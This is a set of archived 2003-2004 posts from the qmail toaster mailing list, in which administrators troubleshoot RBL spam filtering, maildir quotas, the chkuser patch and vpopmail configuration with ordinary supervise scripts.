On Tue, 2004-05-25 at 12:39, Andrew Averin wrote: Hello David, Tuesday, May 25, 2004, 2:11:44 PM, you wrote: D On Tue, 2004-05-25 at 11:52, Andrew Averin wrote: How could I force rbls checks on netqmail-1.05+toaster-0.6 ? mailto:[EMAIL PROTECTED] D Add rblsmtpd to the qmail-smtpd supervise script, like this: D /usr/local/bin/rblsmtpd -b -r sbl.spamhaus.org -r relays.ordb.org \ D That has to be inserted before the qmail-smtpd call. D So aresult could look like this: D exec /usr/local/bin/softlimit -m 1600 \ D envdir /etc/relay-ctrl \ D /usr/bin/relay-ctrl-chdir \ D /usr/local/bin/tcpserver -v -H -R -l 0 \ D -x /etc/tcp.smtp.cdb -c $MAXSMTPD \ D -u $QMAILDUID -g $NOFILESGID 0 smtp \ D/usr/local/bin/rblsmtpd -b -r sbl.spamhaus.org -r relays.ordb.org \ D /usr/bin/relay-ctrl-check /var/qmail/bin/qmail-smtpd \ D /Appz2/VPopMail/bin/vchkpw /bin/true 21 Thank you very much David And one more question? How could I force multilog to be more verbose. In other words I want to see any rbl checks in logs. I have an old qmail installation where I see more information (I believe through splogger). You can use recordio, it logs the whole smtp conversation, including those rbl rejects. Just like this (right before rblsmtpd and qmail-smtpd): /usr/bin/recordio /usr/local/bin/rblsmtpd -b -r sbl.spamhaus.org -r relays.ordb.org But recordio is known to conflict with TLS patch...I don't know if anyone got it working (I miss all the info recordio provides).
[toaster] maildirsize updates (not)
Ok, I can't figure out what is going on. I have the latest toaster install up and working fine but maildirsize doesn't seem to keep up with incoming email. What exactly is supposed to cause maildirsize to be updated? Does it happen each time an email is delivered? maildirsize is being written to but it appears to only happen some of the time. For example here is the maildirsize on a new mailbox: 10485760S,1000C 222690 52 -94881 -1 -2954 -1 -8042 -1 -4420 -1 -5892 -1 -1820 -1 -1341 -1 -42350 -1 -1350 -1 -2515 -1 -4923 -1 -1788 -1 -39311 -1 -2197 -1 -1754 -1 Now this mailbox has over 150 messages in it and that is all that maildirsize has in it. Am I missing something or does this seem not right? FYI, this mailbox (postmaster) has only been opened via squirrelmail. It has never been popped. David Shirley http://www.webquarry.com
Re: [toaster] maildirsize updates (not)
No, no maildrop. It's a virgin toaster straight from your http://www.shupp.org/toaster/ page. Nothing optional was added except for one thing: I substituted qmail-toaster-0.6-1+greylisting.patch for the qmail-toaster-0.6-1.patch.bz2 patch. After making that sustitution I could apply the chkuser-0.6.patch (it failed in chunk 4 if memory serves correct) but I don't see where those substitutions would affect the behavior of updating maildirsize. Does maildirsize get updated each time an agent touches the Maildir in any way or only under certain conditions? On Friday, May 14, 2004, at 09:51 AM, Bill Shupp wrote: ANY agent that delivers mail to this Maildir, be it qmail-local, vdelivermail, procmail, maildrop, or whatever, MUST be Maildir++ aware. Otherwise, maildirsize will be ignored. I'm not a procmail patch for Maildir++. However, maildrop by default does not compile with quota support. You need to compile that in. Perhaps you're using maildrop filters and maildrop is lacking quota support? David Shirley http://www.webquarry.com
Re: [toaster] maildirsize updates (not)
I just confirmed that all aliased mail IS being counted in the quota. The problem seems to lie purely in the quota counts on CATCHALL emails. Can anyone else confirm this behavior? On Friday, May 14, 2004, at 04:43 PM, Tom Collins wrote: Perhaps there's a bug in vdelivermail where it doesn't count catch-all emails against the quota? -- Tom Collins - [EMAIL PROTECTED] David Shirley http://www.webquarry.com
[toaster] chkuser-mysql patch problem
Hi all, I've just upgraded (again) my qmail installation, in an attempt to cut out spam trying random email addresses to my domains, using chkuser-0.6.mysql.patch. I've followed the whole instalation procedure, compiled successfully qmail with the patches. The problem I found is, when using inside .qmail-default, maildrop, the mails are delivered but is not triggered the chkuser patch. And if I use inside .qmail-default, vdelivermail, all mails are rejected, with 550 sorry, no mailbox here by that name (#5.1.1 - chkusr) . Now, looking at mysql access logs, vdelivermail is not looking at mysql to see whether the user exists or not, therefore all emails (included the ones to valid users) are rejected. Has anyone tried this patch and had similar problem? Thanks for your help.
Re: [toaster] chkuser-mysql patch problem
On Thu, 2004-04-22 at 14:53, Jeff Koch wrote: We use the patch with mysql and it works fine. Make sure that you have vpopmail compiled with mysql-auth support. chkuser is a patch to qmail so that it rejects the smtp connection if the email address does not have a valid user name. Yes, vpopmail is compiled with it (I've been using mysql support for a long time already, nonetheless I recompiled it again, but yes , --enable-auth-module=mysql was in config.log). Vpopmail works fine, everything works except vdelivermail at .qmail-defaut. If I use maildrop instead in .qmail-default, and in the maildroprc file vdelivermail then works just fine. So I have no idea why vdelivermail refuses to call mysql in .qmail-default. This is my non-working .qmail-default: | /Appz2/VPopMail/bin/vdelivermail '' bounce-no-mailbox And this is the one, in another domain which does (but no chkuser is triggered): |/usr/bin/maildrop -w 90 ,in the /etc/maildroprc script, here's the line calling vdelivermail: VPOP=| /Appz2/VPopMail/bin/vdelivermail '' bounce-no-mailbox This domain calling maildrop then vdelivermail works (but chkuser doesn't). At 03:38 AM 4/22/2004, you wrote: Hi all, I've just upgraded (again) my qmail installation, in an attempt to cut out spam trying random email addresses to my domains, using chkuser-0.6.mysql.patch. I've followed the whole instalation procedure, compiled successfully qmail with the patches. The problem I found is, when using inside .qmail-default, maildrop, the mails are delivered but is not triggered the chkuser patch. And if I use inside .qmail-default, vdelivermail, all mails are rejected, with 550 sorry, no mailbox here by that name (#5.1.1 - chkusr) . Now, looking at mysql access logs, vdelivermail is not looking at mysql to see whether the user exists or not, therefore all emails (included the ones to valid users) are rejected. Has anyone tried this patch and had similar problem? Thanks for your help. Best Regards, Jeff Koch, Intersessions
Re: [toaster] chkuser-mysql patch problem
On Thu, 2004-04-22 at 17:11, Jeff Koch wrote: Your .qmail-default does not look like a standard toaster install to me. The plain jane toaster with chkuser-mysql support should say: | /home/vpopmail/bin/vdelivermail '' bounce-no-mailbox No, I followed the install but obviously changed folders to fit my current installation. I didn't install all the DJB's tools mentioned in the guide, since I already had them. | /Appz2/VPopMail/bin/vdelivermail '' bounce-no-mailbox In what folder the vpopmail user lies doesn't change anything. As long as you call the binaries properly, at their real location. For example: it's important to notice to change the brand new created conf-vpopmail once applied the chkuser patch. conf-mysql as well. Bill's document for his toaster is completely fine. It just doens't fit already running installations. But it doesn't have to. Nonetheless, it's a very good idea having that large patch with all that funcionalities together. That's why I used it to upgrade. It's a great work. I don't think my problem lies on the way I installed it, maybe there's something wrong in the patch. At 09:59 AM 4/22/2004, you wrote: On Thu, 2004-04-22 at 14:53, Jeff Koch wrote: We use the patch with mysql and it works fine. Make sure that you have vpopmail compiled with mysql-auth support. chkuser is a patch to qmail so that it rejects the smtp connection if the email address does not have a valid user name. Yes, vpopmail is compiled with it (I've been using mysql support for a long time already, nonetheless I recompiled it again, but yes , --enable-auth-module=mysql was in config.log). Vpopmail works fine, everything works except vdelivermail at .qmail-defaut. If I use maildrop instead in .qmail-default, and in the maildroprc file vdelivermail then works just fine. So I have no idea why vdelivermail refuses to call mysql in .qmail-default. This is my non-working .qmail-default: | /Appz2/VPopMail/bin/vdelivermail '' bounce-no-mailbox And this is the one, in another domain which does (but no chkuser is triggered): |/usr/bin/maildrop -w 90 ,in the /etc/maildroprc script, here's the line calling vdelivermail: VPOP=| /Appz2/VPopMail/bin/vdelivermail '' bounce-no-mailbox This domain calling maildrop then vdelivermail works (but chkuser doesn't). At 03:38 AM 4/22/2004, you wrote: Hi all, I've just upgraded (again) my qmail installation, in an attempt to cut out spam trying random email addresses to my domains, using chkuser-0.6.mysql.patch. I've followed the whole instalation procedure, compiled successfully qmail with the patches. The problem I found is, when using inside .qmail-default, maildrop, the mails are delivered but is not triggered the chkuser patch. And if I use inside .qmail-default, vdelivermail, all mails are rejected, with 550 sorry, no mailbox here by that name (#5.1.1 - chkusr) . Now, looking at mysql access logs, vdelivermail is not looking at mysql to see whether the user exists or not, therefore all emails (included the ones to valid users) are rejected. Has anyone tried this patch and had similar problem? Thanks for your help. Best Regards, Jeff Koch, Intersessions Best Regards, Jeff Koch, Intersessions
[toaster] Perhaps this has been asnwered before but...
... I couldn't find it in the archives. I notice that my toaster is spending a great deal of time attempting to deliver bounce notices for spam mail that it accepted. (spam was addressed to random names with domains hosted on the toaster) Naturally these bounce notice do not go through since the replyto address are invalid. Is there any way to prevent to prevent the toaster from accepting mail in the first place that doesn't have a valid replyto address on it? David Shirley http://www.webquarry.com
RE: [toaster] qmail/vpopmail/quotas
Thanks for the tip. Unfortunately, it didn't work. :( I think I'm going to start back with a generic qmail install to get things working first and then try adding the components one by one. I started with that qmail.nu's lazydog script, but it's so full of features and so poorly documented that it's only confused the issue. If I'm missing a how-to that's available somewhere to explain how to setup a qmail install with local and virtual account setup and admin, please let me know! It seems like this would be a very common setup, but I don't know. How does everyone setup their qmail servers and why wouldn't you want some local ~/Maildir users mixed with some virtual users? Dave -Original Message- From: Bill Shupp [mailto:[EMAIL PROTECTED] Sent: Sunday, September 21, 2003 4:59 PM To: [EMAIL PROTECTED] Subject: Re: [toaster] qmail/vpopmail/quotas From: [EMAIL PROTECTED] Date: Sun Sep 21, 2003 1:48:34 PM America/Los_Angeles To: [EMAIL PROTECTED] Subject: failure notice Hi. This is the qmail-send program at merchbox.com. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. [EMAIL PROTECTED]: Sorry, only subscribers may post. If you are a subscriber, please forward this message to [EMAIL PROTECTED] to get your new address included (#5.7.2) --- Below this line is a copy of the message. Return-Path: [EMAIL PROTECTED] Received: (qmail 23081 invoked by uid 672); 21 Sep 2003 20:48:34 - Received: from [EMAIL PROTECTED] by ns1 by uid 530 with qmail-scanner-1.20rc3 (clamuko: 0.60. Clear:RC:0:. Processed in 0.178244 secs); 21 Sep 2003 20:48:34 - Received: from unknown (HELO merchbox.com) ([EMAIL PROTECTED]@4.60.1.29) by 0 with DES-CBC3-SHA encrypted SMTP; 21 Sep 2003 20:48:34 - Date: Sun, 21 Sep 2003 13:48:30 -0700 Subject: Re: [toaster] qmail/vpopmail/quotas Content-Type: text/plain; charset=US-ASCII; format=flowed Mime-Version: 1.0 (Apple Message framework v552) From: Bill Shupp [EMAIL PROTECTED] To: [EMAIL PROTECTED] Content-Transfer-Encoding: 7bit In-Reply-To: [EMAIL PROTECTED] Message-Id: [EMAIL PROTECTED] X-Mailer: Apple Mail (2.552) On Sunday, September 21, 2003, at 12:44 PM, David McMahon wrote: Hi, I'm hoping this is the right place to be asking this question... If not, do you know where I should be asking? Anyway, is there a guide somewhere that describes setting up vpopmail/qmail for local and virtual users together? I have a single IP system hosting 8 domains. 1/2 my users are real /etc/passwd users with home directories I'd like to store their e-mail in ~/Maildir and then there are a bunch of other forward-only people and some virtual (non /etc/passwd) users I want vpopmail to handle and store their email. Is there a simple how-to guide on the web explaining how to set this up. The vpopmail doc only seems to talk specifically about the virtual side and I'm not seeing how to make it work with qmail and do what I want to do (non-virt virt). I used www.qmail.ru lazydog setup with a number of patches (maildir++) and all-in-one feature set. Bottom line and the reason I'm asking on this list is, I get the following in my maillog when I try sending to a local user. Sep 20 23:35:26 host1 qmail: 1064115326.821226 delivery 274: failure: User_over_quota._(#5.1.1)/ This is a brand new RH9 system with NO mail on it at all. There's no way the user is over quota. Can anyone be of assistance? You should be able to do a standard install of vpopmail (grab the latest devel version) with --enable-passwd=y. You may need to run qmail-pop3d as either qmaild or root, I haven't done it in a while. Regards, Bill
[toaster] qmail/vpopmail/quotas
Hi, I'm hoping this is the right place to be asking this question... If not, do you know where I should be asking? Anyway, is there a guide somewhere that describes setting up vpopmail/qmail for local and virtual users together? I have a single IP system hosting 8 domains. 1/2 my users are real /etc/passwd users with home directories I'd like to store their e-mail in ~/Maildir and then there are a bunch of other forward-only people and some virtual (non /etc/passwd) users I want vpopmail to handle and store their email. Is there a simple how-to guide on the web explaining how to set this up. The vpopmail doc only seems to talk specifically about the virtual side and I'm not seeing how to make it work with qmail and do what I want to do (non-virt virt). I used www.qmail.ru lazydog setup with a number of patches (maildir++) and all-in-one feature set. Bottom line and the reason I'm asking on this list is, I get the following in my maillog when I try sending to a local user. Sep 20 23:35:26 host1 qmail: 1064115326.821226 delivery 274: failure: User_over_quota._(#5.1.1)/ This is a brand new RH9 system with NO mail on it at all. There's no way the user is over quota. Can anyone be of assistance? dave
[toaster] Confused about some toaster scripts
In the smtpd.run script I see: #!/bin/sh QMAILDUID=`id -u vpopmail` NOFILESGID=`id -g vpopmail` MAXSMTPD=`cat /var/qmail/control/concurrencyincoming` exec /usr/local/bin/softlimit -m 600 \ /usr/local/bin/tcpserver -H -R -l 0 \ -x /home/vpopmail/etc/tcp.smtp.cdb -c $MAXSMTPD \ -u $QMAILDUID -g $NOFILESGID 0 smtp \ /var/qmail/bin/qmail-smtpd domain.com \ /home/vpopmail/bin/vchkpw /bin/true 21 Now I can explain everything that is there except for the domain.com part. Shouldn't that be changed to our hostname and not left generic like that? David Shirley [EMAIL PROTECTED] http://www.webquarry.com
[toaster] Disappearing domains
Ok this is weird. I have a client (only one) that cannot connect to the vpopmail admin nor the sqwebmail stuff from his machine. (he gets the invalid login errors as if the password was wrong) He can connect just fine from other machines AND he can collect mail via pop3 on the postmaster account from his apperantly afflicted machine. When he trys to connect to sqwebmail from that one machine we see in the apache error log: malformed header from script. Bad header=domain invalid ~~~: /usr/local/apache/cgi-bin/sqwebmail even though he is typing in his domain correctly. Now it gets weirder and potentially more alarming: While he was on the phone with us attempting to figure out what is going on, we observed his domain directory (/home/vpopmail/domains/hisdomain.com) disappear completely during his attempt to connect with vqmailadmin and sqwebmail. The dir was deleted. Entries in assign, morercpthosts etc remained. Any clues how that could occur? If replying to this email, please quote the entire thread. I get 200 emails a day and if you don't, I'll have no idea what we are talking about. David M. Shirley [EMAIL PROTECTED] http://www.webquarry.com/ - Get rock solid web hosting at The Web Quarry! http://www.webquarry.com/free43.html .com, .net and .org domains for $15! http://www.webquarry.com/domains/ -